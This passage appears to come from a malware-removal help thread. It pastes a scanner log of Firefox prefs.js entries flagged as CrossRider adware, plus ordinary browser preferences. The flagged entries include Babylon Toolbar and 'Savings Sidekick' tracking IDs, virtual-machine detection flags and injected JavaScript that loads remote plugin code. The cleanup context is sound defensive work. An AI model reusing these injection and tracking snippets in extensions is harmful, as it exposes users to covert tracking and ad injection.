user_pref(&quot;browser.taskbar.lastgroupid&quot;, &quot;E7CF176E110C211B&quot;);
user_pref(&quot;browser.toolbarbuttons.introduced.pocket-button&quot;, true);
user_pref(&quot;browser.uiCustomization.state&quot;, &quot;{\&quot;placements\&quot;:{\&quot;PanelUI-contents\&quot;:[\&quot;edit-controls\&quot;,\&quot;zoom-controls\&quot;,\&quot;new-window-button\&quot;,\&quot;privatebrowsing-button\&quot;,\&quot;save-page-button\&quot;,\&quot;print-button\&quot;,\&quot;history-panelmenu\&quot;,\&quot;fullscreen-button\&quot;,\&quot;find-button\&quot;,\&quot;add-ons-button\&quot;,\&quot;developer-button\&quot;,\&quot;preferences-button\&quot;],\&quot;addon-bar\&quot;:[\&quot;addonbar-closebutton\&quot;,\&quot;customizableui-special-spring1\&quot;,\&quot;status-bar\&quot;],\&quot;PersonalToolbar\&quot;:[\&quot;personal-bookmarks\&quot;],\&quot;nav-bar\&quot;:[\&quot;unified-back-forward-button\&quot;,\&quot;urlbar-container\&quot;,\&quot;reload-button\&quot;,\&quot;stop-button\&quot;,\&quot;search-container\&quot;,\&quot;webrtc-status-button\&quot;,\&quot;bookmarks-menu-button\&quot;,\&quot;pocket-button\&quot;,\&quot;downloads-button\&quot;,\&quot;home-button\&quot;,\&quot;window-controls\&quot;,\&quot;social-share-button\&quot;,\&quot;loop-button-throttled\&quot;,\&quot;loop-button\&quot;],\&quot;TabsToolbar\&quot;:[\&quot;tabbrowser-tabs\&quot;,\&quot;new-tab-button\&quot;,\&quot;alltabs-button\&quot;,\&quot;tabs-closebutton\&quot;],\&quot;toolbar-menubar\&quot;:[\&quot;menubar-items\&quot;]},\&quot;seen\&quot;:[],\&quot;dirtyAreaCache\&quot;:[\&quot;addon-bar\&quot;,\&quot;PersonalToolbar\&quot;,\&quot;nav-bar\&quot;,\&quot;TabsToolbar\&quot;,\&quot;toolbar-menubar\&quot;,\&quot;PanelUI-contents\&quot;],\&quot;currentVersion\&quot;:4,\&quot;newElementCount\&quot;:1}&quot;);
user_pref(&quot;browser.uitour.whitelist.add.260&quot;, &quot;&quot;);
user_pref(&quot;browser.uitour.whitelist.add.340&quot;, &quot;&quot;);
user_pref(&quot;browser.urlbar.autocomplete.enabled&quot;, false);
user_pref(&quot;browser.urlbar.suggest.bookmark&quot;, false);
user_pref(&quot;browser.urlbar.suggest.history&quot;, false);
user_pref(&quot;browser.urlbar.suggest.openpage&quot;, false);
user_pref(&quot;datareporting.healthreport.lastDataSubmissionFailureTime&quot;, &quot;1435040802954&quot;);
user_pref(&quot;datareporting.healthreport.lastDataSubmissionRequestedTime&quot;, &quot;1449324463516&quot;);
user_pref(&quot;datareporting.healthreport.lastDataSubmissionSuccessfulTime&quot;, &quot;1449324465597&quot;);
user_pref(&quot;datareporting.healthreport.nextDataSubmissionTime&quot;, &quot;1449410865597&quot;);
user_pref(&quot;datareporting.healthreport.service.firstRun&quot;, true);
user_pref(&quot;datareporting.policy.dataSubmissionPolicyAcceptedVersion&quot;, 2);
user_pref(&quot;datareporting.policy.dataSubmissionPolicyNotifiedTime&quot;, &quot;1417596264603&quot;);
user_pref(&quot;datareporting.policy.firstRunTime&quot;, &quot;1365871572512&quot;);
user_pref(&quot;datareporting.sessions.current.activeTicks&quot;, 7);
user_pref(&quot;datareporting.sessions.current.firstPaint&quot;, 26881);
user_pref(&quot;datareporting.sessions.current.main&quot;, 17238);
user_pref(&quot;datareporting.sessions.current.sessionRestored&quot;, 28445);
user_pref(&quot;datareporting.sessions.current.startTime&quot;, &quot;1449386316097&quot;);
user_pref(&quot;datareporting.sessions.current.totalTime&quot;, 56);
user_pref(&quot;datareporting.sessions.currentIndex&quot;, 2040);
user_pref(&quot;datareporting.sessions.previous.2039&quot;, &quot;{\&quot;s\&quot;:1449305208258,\&quot;a\&quot;:5540,\&quot;t\&quot;:48663,\&quot;c\&quot;:true,\&quot;m\&quot;:124,\&quot;fp\&quot;:1248,\&quot;sr\&quot;:1446}&quot;);
user_pref(&quot;datareporting.sessions.prunedIndex&quot;, 2038);
user_pref(&quot;devtools.telemetry.tools.opened.version&quot;, &quot;{\&quot;DEVTOOLS_TOOLBOX_OPENED_PER_USER_FLAG\&quot;:\&quot;36.0.4\&quot;,\&quot;DEVTOOLS_INSPECTOR_OPENED_PER_USER_FLAG\&quot;:\&quot;36.0.4\&quot;,\&quot;DEVTOOLS_RULEVIEW_OPENED_PER_USER_FLAG\&quot;:\&quot;36.0.4\&quot;}&quot;);
user_pref(&quot;devtools.toolbox.selectedTool&quot;, &quot;inspector&quot;);
user_pref(&quot;devtools.toolsidebar-width.inspector&quot;, 0);
user_pref(&quot;dom.apps.reset-permissions&quot;, true);
user_pref(&quot;dom.disable_open_during_load&quot;, false);
user_pref(&quot;dom.mozApps.used&quot;, true);
user_pref(&quot;dom.w3c_touch_events.expose&quot;, false);
user_pref(&quot;experiments.activeExperiment&quot;, false);
user_pref(&quot;extensions.BabylonToolbar_i.aflt&quot;, &quot;babsst&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.babExt&quot;, &quot;&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.babTrack&quot;, &quot;affID=110819&amp;tt=010712_3&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.hardId&quot;, &quot;16123040000000000000062454f2a604&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.id&quot;, &quot;16123040000000000000062454f2a604&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.instlDay&quot;, &quot;15525&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.instlRef&quot;, &quot;sst&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.prdct&quot;, &quot;BabylonToolbar&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.prtnrId&quot;, &quot;babylon&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.smplGrp&quot;, &quot;none&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.srcExt&quot;, &quot;ss&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.tlbrId&quot;, &quot;tb9&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.vrsn&quot;, &quot;1.5.3.17&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.vrsnTs&quot;, &quot;1.5.3.1715:08:45&quot;);
user_pref(&quot;extensions.BabylonToolbar_i.vrsni&quot;, &quot;1.5.3.17&quot;);
user_pref(&quot;extensions.blocklist.pingCountTotal&quot;, 1064);
user_pref(&quot;extensions.blocklist.pingCountVersion&quot;, 20);
user_pref(&quot;extensions.bootstrappedAddons&quot;, &quot;{}&quot;);
user_pref(&quot;extensions.crossrider.bic&quot;, &quot;139c5ccd042fc6d366e9efe2a8a22d88&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.InstallationThankYouPage&quot;, true);
user_pref(&quot;extensions.crossriderapp5060.5060.InstallationTime&quot;, 1347643228);
user_pref(&quot;extensions.crossriderapp5060.5060.InstallationUserSettings.searchUserConifrmation&quot;, false);
user_pref(&quot;extensions.crossriderapp5060.5060.InstallationUserSettings.setHomepage&quot;, false);
user_pref(&quot;extensions.crossriderapp5060.5060.InstallationUserSettings.setNewTab&quot;, false);
user_pref(&quot;extensions.crossriderapp5060.5060.InstallationUserSettings.setSearch&quot;, false);
user_pref(&quot;extensions.crossriderapp5060.5060.active&quot;, true);
user_pref(&quot;extensions.crossriderapp5060.5060.addressbar&quot;, &quot;&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.backgroundjs&quot;, &quot;\n\n\&quot;undefined\&quot;!=typeof _GPL_BG_NEW&amp;&amp;appAPI.webRequest&amp;&amp;appAPI.webRequest.onBeforeNavigate?_GPL_BG_NEW.preinit():\&quot;undefined\&quot;!=typeof _GPL_BG&amp;&amp;appAPI.onRequest&amp;&amp;_GPL_BG.preinit();\n&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.backgroundver&quot;, 7);
user_pref(&quot;extensions.crossriderapp5060.5060.can_run_bg_code&quot;, true);
user_pref(&quot;extensions.crossriderapp5060.5060.certdomaininstaller&quot;, &quot;&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.changeprevious&quot;, false);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie.InstallationTime.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie.InstallationTime.value&quot;, &quot;1347643228&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie.InstallerParams.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_aoi.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_aoi.value&quot;, &quot;1347643228&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_blocklist.expiration&quot;, &quot;Fri Nov 30 2012 17:31:43 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_blocklist.value&quot;, &quot;%22nonexistantdomain.com%22&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_country_code.expiration&quot;, &quot;Sun Dec 02 2012 14:58:35 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_country_code.value&quot;, &quot;%22DE%22&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_crr.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_crr.value&quot;, &quot;1354292451&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_hotfix20111102645.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_hotfix20111102645.value&quot;, &quot;%221%22&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_installer_params.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_installer_params.value&quot;, &quot;%7B%22source_id%22%3A%220%22%2C%22sub_id%22%3A%220%22%2C%22uzid%22%3A%220%22%7D&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_parent_zoneid.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_parent_zoneid.value&quot;, &quot;%2214019%22&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_pc_20120828.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_pc_20120828.value&quot;, &quot;1347643324716&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_product_id.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_product_id.value&quot;, &quot;%221224%22&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_zoneid.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie._GPL_zoneid.value&quot;, &quot;%2282063%22&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie.dbtest.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.cookie.dbtest.value&quot;, &quot;1347643311989&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.description&quot;, &quot;Savings Sidekick&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.domain&quot;, &quot;&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.enablesearch&quot;, false);
user_pref(&quot;extensions.crossriderapp5060.5060.fbremoteurl&quot;, &quot;&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.group&quot;, 0);
user_pref(&quot;extensions.crossriderapp5060.5060.homepage&quot;, &quot;&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.iframe&quot;, false);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.InstallerIdentifiers.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.InstallerIdentifiers.value&quot;, &quot;%7B%22installer_bic%22%3A%22B2F0E20977AD4C33ABC24800D8090F46IE%22%2C%22installer_verifier%22%3A%22a4b03d63b8bf5d68245e569a6d0f510a%22%2C%22installer_verifier_for_215app%22%3A%222456002ffb0c784079745e982e7370a8%22%7D&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_appVer.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_appVer.value&quot;, &quot;38&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_lastVersion.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_lastVersion.value&quot;, &quot;0&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_meta.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_meta.value&quot;, &quot;%7B%7D&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_nextCheck.expiration&quot;, &quot;Fri Nov 30 2012 23:20:51 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_nextCheck.value&quot;, &quot;true&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_queue.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_queue.value&quot;, &quot;%7B%7D&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_remote_resources.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.Resources_remote_resources.value&quot;, &quot;%7B%22remoteId%22%3A0%7D&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.SoftwareDetected.expiration&quot;, &quot;Fri Feb 01 2030 00:00:00 GMT+0100&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.internaldb.SoftwareDetected.value&quot;, &quot;%7B%22AnySoftware%22%3Afalse%2C%22Wireshark%22%3Afalse%2C%22VirtualBox%22%3Afalse%2C%22VMWare%22%3Afalse%2C%22InsideVM%22%3Afalse%2C%22InsideVMWare%22%3Afalse%2C%22InsideVirtualBox%22%3Afalse%2C%22InsideVirtualPc%22%3Afalse%7D&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.js&quot;, &quot;\n\nif(\&quot;undefined\&quot;!=typeof _GPL_PLUGIN){var _GPL_=function(){_GPL_PLUGIN.started||_GPL_PLUGIN.prepare({pid:1224,baseCDN:\&quot;savingsside-a.akamaihd.net\&quot;})};$jquery(document).ready(_GPL_);setTimeout(_GPL_,5E3)};\n\n\n\n&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.manifesturl&quot;, &quot;&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.name&quot;, &quot;Savings Sidekick&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.newtab&quot;, &quot;&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.opensearch&quot;, &quot;&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_1.code&quot;, &quot;appAPI._cr_config={appID:function(){var a=appAPI.appInfo;if(a){return appAPI.appInfo.id}else{return appAPI.appID}}};$jquery.extend(appAPI._cr_config,{sidebar:{base:{production:\&quot;hxxp://static.crossrider.com\&quot;,staging:\&quot;hxxp://staging-app.crossrider.com\&quot;},css:\&quot;/plugins/stylesheets/sidebar.css\&quot;,themes:\&quot;/plugins/images/sidebar\&quot;}});$jquery.extend(appAPI._cr_config,{notifications_manager:{base:{production:\&quot;hxxp://nstatic.crossrider.com\&quot;,staging:\&quot;hxxp://staging-app.crossrider.com\&quot;},statsBase:{production:\&quot;hxxp://nstats.crossrider.com\&quot;,staging:\&quot;hxxp://staging-app.crossrider.com\&quot;},geolocation:\&quot;hxxp://www.geoplugin.net/json.gp?jsoncallback=fn\&quot;,meta:\&quot;/notifier/\&quot;+appAPI._cr_config.appID()+\&quot;/meta.json\&quot;,messages:\&quot;/notifier/\&quot;+appAPI._cr_config.appID()+\&quot;/{id}.json\&quot;,logger:\&quot;/notifications.gif\&quot;,loggerAPI:\&quot;/api_notifications.gif\&quot;},notifications:{base:{production:\&quot;hxxp://nstatic.crossrider.com\&quot;,staging:\&quot;hxxp://staging-app.crossrider.com\&quot;},css:\&quot;/plugins/stylesheets/notifications.css\&quot;,themes:\&quot;/plugins/images/notifications\&quot;}});$jquery.extend(appAPI._cr_config,{debug_app:{debug_page:[\&quot;crossrider.com\&quot;,\&quot;staging.crossrider.com\&quot;]}});$jquery.extend(appAPI._cr_config,{resources:{jQuery:{url:\&quot;https://ajax.googleapis.com/ajax/libs/jquery/{version}/jquery.min.js\&quot;,cacheTime:10},jQueryUI:{url:\&quot;https://ajax.googleapis.com/ajax/libs/jqueryui/{version}/jquery-ui.min.js\&quot;,cacheTime:10},base:{production:\&quot;hxxp://resources.crossrider.com\&quot;,staging:\&quot;hxxp://staging-app.crossrider.com\&quot;},update:\&quot;/apps/{appId}/resources/meta/{lastVersion}\&quot;}});(function(c){var b=!1,a=/xyz/.test(function(){})?/\\b_super\\b/:/.*/;c.Class=function(){};c.Class.extend=function(e){function j(){!b&amp;&amp;this.init&amp;&amp;this.init.apply(this,arguments)}var i=this.prototype;b=!0;var h=new this;b=!1;for(var g in e){h[g]=\&quot;function\&quot;==typeof e[g]&amp;&amp;\&quot;function\&quot;==typeof i[g]&amp;&amp;a.test(e[g])?function(f,d){return function(){var l=this._super;this._super=i[f];var k=d.apply(this,arguments);this._super=l;return k}}(g,e[g]):e[g]}j.prototype=h;j.prototype.constructor=j;j.extend=arguments.callee;return j}})($jquery_171);appAPI.JSONParser={};(function(){function k(a){return 10&gt;</baddata><gooddata></gooddata><hash>b821bee38704d46222a13e5cba4a9769</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>n j}})($jquery_171);appAPI.JSONParser={};(function(){function k(a){return 10&gt;a?\&quot;0\&quot;+a:a}function </baddata><gooddata></gooddata><hash>d900c6db8704af87497a8317fc0813ed</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata> this file.
 *
 * If you make changes to this file while the application is running,
 * the changes will be overwritten when the application exits.
 *
 * To make a manual change to preferences, you can visit the URL about:config
 */
         
Teil 3

Code:
ATTFilter
user_pref(&quot;accessibility.typeaheadfind.flashBar&quot;, 0);
user_pref(&quot;app.update.lastUpdateTime.addon-background-update-timer&quot;, 1449326518);
user_pref(&quot;app.update.lastUpdateTime.background-update-timer&quot;, 1449310788);
user_pref(&quot;app.update.lastUpdateTime.blocklist-background-update-timer&quot;, 1449324908);
user_pref(&quot;app.update.lastUpdateTime.browser-cleanup-thumbnails&quot;, 1449353054);
user_pref(&quot;app.update.lastUpdateTime.experiments-update-timer&quot;, 1449326398);
user_pref(&quot;app.update.lastUpdateTime.search-engine-update-timer&quot;, 1449343906);
user_pref(&quot;app.update.lastUpdateTime.xpi-signature-verification&quot;, 1449326278);
user_pref(&quot;app.update.migrated.updateDir&quot;, true);
user_pref(&quot;browser.bookmarks.restore_default_bookmarks&quot;, false);
user_pref(&quot;browser.cache.disk.capacity&quot;, 0);
user_pref(&quot;browser.cache.disk.filesystem_reported&quot;, 1);
user_pref(&quot;browser.cache.disk.smart_size.enabled&quot;, false);
user_pref(&quot;browser.cache.disk.smart_size.first_run&quot;, false);
user_pref(&quot;browser.cache.disk.smart_size.use_old_max&quot;, false);
user_pref(&quot;browser.cache.disk.smart_size_cached_value&quot;, 358400);
user_pref(&quot;browser.cache.frecency_experiment&quot;, 3);
user_pref(&quot;browser.customizemode.tip0.shown&quot;, true);
user_pref(&quot;browser.download.importedFromSqlite&quot;, true);
user_pref(&quot;browser.download.manager.retention&quot;, 0);
user_pref(&quot;browser.download.panel.firstSessionCompleted&quot;, true);
user_pref(&quot;browser.download.panel.shown&quot;, true);
user_pref(&quot;browser.download.save_converter_index&quot;, 0);
user_pref(&quot;browser.feeds.showFirstRunUI&quot;, false);
user_pref(&quot;browser.formfill.enable&quot;, false);
user_pref(&quot;browser.hotfix.v20150225.01.complete&quot;, true);
user_pref(&quot;browser.migration.version&quot;, 30);
user_pref(&quot;browser.newtabpage.blocked&quot;, &quot;{\&quot;IoDyuodwFMMBuEJuNT5LZA==\&quot;:1,\&quot;2/Jajwm5xLUkQYEtqKKJuA==\&quot;:1,\&quot;5XYqhwwFl8Nm3aa/bzTEXA==\&quot;:1,\&quot;XN0gzX5CZdmIYOEKmV0GVA==\&quot;:1,\&quot;Fxqb5qY5liKaWb0nxW1VIQ==\&quot;:1,\&quot;5dPX2t2Xtq7V1dnRJu5irg==\&quot;:1,\&quot;fN+l9WzvM5iUCIvEhEOYEQ==\&quot;:1,\&quot;JsXUxU9t1wOIlkZ9TyVEsg==\&quot;:1,\&quot;er4xCOhSuEoh6/Q+OsASGw==\&quot;:1,\&quot;ewuiteJbUq/F9Zuy9EJhMA==\&quot;:1}&quot;);
user_pref(&quot;browser.newtabpage.enhanced&quot;, true);
user_pref(&quot;browser.newtabpage.introShown&quot;, true);
user_pref(&quot;browser.newtabpage.storageVersion&quot;, 1);
user_pref(&quot;browser.pagethumbnails.storage_version&quot;, 3);
user_pref(&quot;browser.places.smartBookmarksVersion&quot;, 7);
user_pref(&quot;browser.preferences.advanced.selectedTabIndex&quot;, 3);
user_pref(&quot;browser.privatebrowsing.autostart&quot;, true);
user_pref(&quot;browser.reader.detectedFirstArticle&quot;, true);
user_pref(&quot;browser.rights.3.shown&quot;, true);
user_pref(&quot;browser.search.countryCode&quot;, &quot;DE&quot;);
user_pref(&quot;browser.search.isUS&quot;, false);
user_pref(&quot;browser.search.region&quot;, &quot;DE&quot;);
user_pref(&quot;browser.search.selectedEngine&quot;, &quot;Google&quot;);
user_pref(&quot;browser.sessionstore.upgradeBackup.latestBuildID&quot;, &quot;20140923175406&quot;);
user_pref(&quot;browser.shell.mostRecentDateSetAsDefault&quot;, &quot;1449386344&quot;);
user_pref(&quot;browser.slowStartup.averageTime&quot;, 0);
user_pref(&quot;browser.slowStartup.notificationDisabled&quot;, true);
user_pref(&quot;browser.slowStartup.samples&quot;, 0);
user_pref(&quot;browser.startup.homepage&quot;, &quot;www.google.de&quot;);
user_pref(&quot;browser.startup.homepage_override.buildID&quot;, &quot;20151029151421&quot;);
user_pref(&quot;browser.startup.homepage_override.mstone&quot;, &quot;42.0&quot;);
user_pref(&quot;browser.syncPromoViewsLeftMap&quot;, &quot;{\&quot;bookmarks\&quot;:4}&quot;);
user_pref(&quot;browser.tabs.warnOnClose&quot;, false);
user_pref(&quot;browser.taskbar.lastgroupid&quot;, &quot;E7CF176E110C211B&quot;);
user_pref(&quot;browser.toolbarbuttons.introduced.pocket-button&quot;, true);
user_pref(&quot;browser.uiCustomization.state&quot;, &quot;{\&quot;placements\&quot;:{\&quot;PanelUI-contents\&quot;:[\&quot;edit-controls\&quot;,\&quot;zoom-controls\&quot;,\&quot;new-window-button\&quot;,\&quot;privatebrowsing-button\&quot;,\&quot;save-page-button\&quot;,\&quot;print-button\&quot;,\&quot;history-panelmenu\&quot;,\&quot;fullscreen-button\&quot;,\&quot;find-button\&quot;,\&quot;add-ons-button\&quot;,\&quot;developer-button\&quot;,\&quot;preferences-button\&quot;],\&quot;addon-bar\&quot;:[\&quot;addonbar-closebutton\&quot;,\&quot;customizableui-special-spring1\&quot;,\&quot;status-bar\&quot;],\&quot;PersonalToolbar\&quot;:[\&quot;personal-bookmarks\&quot;],\&quot;nav-bar\&quot;:[\&quot;unified-back-forward-button\&quot;,\&quot;urlbar-container\&quot;,\&quot;reload-button\&quot;,\&quot;stop-button\&quot;,\&quot;search-container\&quot;,\&quot;webrtc-status-button\&quot;,\&quot;bookmarks-menu-button\&quot;,\&quot;pocket-button\&quot;,\&quot;downloads-button\&quot;,\&quot;home-button\&quot;,\&quot;window-controls\&quot;,\&quot;social-share-button\&quot;,\&quot;loop-button-throttled\&quot;,\&quot;loop-button\&quot;],\&quot;TabsToolbar\&quot;:[\&quot;tabbrowser-tabs\&quot;,\&quot;new-tab-button\&quot;,\&quot;alltabs-button\&quot;,\&quot;tabs-closebutton\&quot;],\&quot;toolbar-menubar\&quot;:[\&quot;menubar-items\&quot;]},\&quot;seen\&quot;:[],\&quot;dirtyAreaCache\&quot;:[\&quot;addon-bar\&quot;,\&quot;PersonalToolbar\&quot;,\&quot;nav-bar\&quot;,\&quot;TabsToolbar\&quot;,\&quot;toolbar-menubar\&quot;,\&quot;PanelUI-contents\&quot;],\&quot;currentVersion\&quot;:4,\&quot;newElementCount\&quot;:1}&quot;);
user_pref(&quot;browser.uitour.whitelist.add.260&quot;, &quot;&quot;);
user_pref(&quot;browser.uitour.whitelist.add.340&quot;, &quot;&quot;);
user_pref(&quot;browser.urlbar.autocomplete.enabled&quot;, false);
user_pref(&quot;browser.urlbar.suggest.bookmark&quot;, false);
user_pref(&quot;browser.urlbar.suggest.history&quot;, false);
user_pref(&quot;browser.urlbar.suggest.openpage&quot;, false);
user_pref(&quot;datareporting.healthreport.lastDataSubmissionFailureTime&quot;, &quot;1435040802954&quot;);
user_pref(&quot;datareporting.healthreport.lastDataSubmissionRequestedTime&quot;, &quot;1449324463516&quot;);
user_pref(&quot;datareporting.healthreport.lastDataSubmissionSuccessfulTime&quot;, &quot;1449324465597&quot;);
user_pref(&quot;datareporting.healthreport.nextDataSubmissionTime&quot;, &quot;1449410865597&quot;);
user_pref(&quot;datareporting.healthreport.service.firstRun&quot;, true);
user_pref(&quot;datareporting.policy.dataSubmissionPolicyAcceptedVersion&quot;, 2);
user_pref(&quot;datareporting.policy.dataSubmissionPolicyNotifiedTime&quot;, &quot;1417596264603&quot;);
user_pref(&quot;datareporting.policy.firstRunTime&quot;, &quot;1365871572512&quot;);
user_pref(&quot;datareporting.sessions.current.activeTicks&quot;, 7);
user_pref(&quot;datareporting.sessions.current.firstPaint&quot;, 26881);
user_pref(&quot;datareporting.sessions.current.main&quot;, 17238);
user_pref(&quot;datareporting.sessions.current.sessionRestored&quot;, 28445);
user_pref(&quot;data</baddata><gooddata></gooddata><hash>eeebbde4c1caac8adae9316913f1a759</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>ef(&quot;datareporting.sessions.current.sessionRestored&quot;, 28445);
user_pref(&quot;datareporting.sessi</baddata><gooddata></gooddata><hash>a633c5dc9dee37ff41820c8e966eb34d</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata>
 * If you make changes to this file while the application is running,
</baddata><gooddata></gooddata><hash>4a8ff1b093f8a88e299ab1e99e667789</hash></file>
<file><path>C:\Users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\prefs.js</path><vendor>PUP.Optional.CrossRider</vendor><action>replaced</action><baddata> edit this file.
 *
 * If you make changes to this file while the application is running,
 * the changes will be overwritten when the application exits.
 *
 * To make a manual change to preferences, you can visit the URL about:config
 */

user_pref(&quot;accessibility.typeaheadfind.flashBar&quot;, 0);
user_pref(&quot;app.update.lastUpdateTime.addon-background-update-timer&quot;, 1449326518);
user_pref(&quot;app.update.lastUpdateTime.background-update-timer&quot;, 1449310788);
user_pref(&quot;app.update.lastUpdateTime.blocklist-background-update-timer&quot;, 1449324908);
user_pref(&quot;app.update.lastUpdateTime.browser-cleanup-thumbnails&quot;, 1449353054);
user_pref(&quot;app.update.lastUpdateTime.experiments-update-timer&quot;, 1449326398);
user_pref(&quot;app.update.lastUpdateTime.search-engine-update-timer&quot;, 1449343906);
user_pref(&quot;app.update.lastUpdateTime.xpi-signature-verification&quot;, 1449326278);
user_pref(&quot;app.update.migrated.updateDir&quot;, true);
user_pref(&quot;browser.bookmarks.restore_default_bookmarks&quot;, false);
user_pref(&quot;browser.cache.disk.capacity&quot;, 0);
user_pref(&quot;browser.cache.disk.filesystem_reported&quot;, 1);
user_pref(&quot;browser.cache.disk.smart_size.enabled&quot;, false);
user_pref(&quot;browser.cache.disk.smart_size.first_run&quot;, false);
user_pref(&quot;browser.cache.disk.smart_size.use_old_max&quot;, false);
user_pref(&quot;browser.cache.disk.smart_size_cached_value&quot;, 358400);
user_pref(&quot;browser.cache.frecency_experiment&quot;, 3);
user_pref(&quot;browser.customizemode.tip0.shown&quot;, true);
user_pref(&quot;browser.download.importedFromSqlite&quot;, true);
user_pref(&quot;browser.download.manager.retention&quot;, 0);
